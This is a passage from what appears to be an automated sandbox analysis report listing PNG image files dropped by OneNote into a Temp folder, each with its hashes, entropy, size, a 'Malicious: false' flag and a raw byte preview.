SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{D7EB8821-E7E4-4887-84CD-0ED9260AE465}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{DB2C2F5E-A4B5-456E-9193-4939A23D5B73}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{DB6A26D6-A0D9-4839-A852-C32CAEF68D14}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{DBD5AF56-01B4-4851-81D0-BCA623D9F72E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{DBE80CD6-EED4-4A4F-8C87-E54945CB772F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{DD8F3A59-D4F8-42B8-8FAB-7ADCEF20F9CB}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{DFCD3D38-FA5F-4120-806B-CDD90697A716}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{E19D281E-C888-4121-916B-3791EA26BE5D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{E35A8014-0DA1-4660-BCFD-E2DC309A8078}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{E41E8A9E-0676-468E-A9F8-D7D50313D79E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{E4A2F1F6-4CCF-49EC-A7AE-EB1341EFB775}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{E4D4D793-CA9D-42C0-B9CB-70F75141D110}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{E6097FDA-FDC3-49F4-85B3-EED575EBC9CB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{E8B3F311-DB79-40FC-BD0A-807AA84D2DFA}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
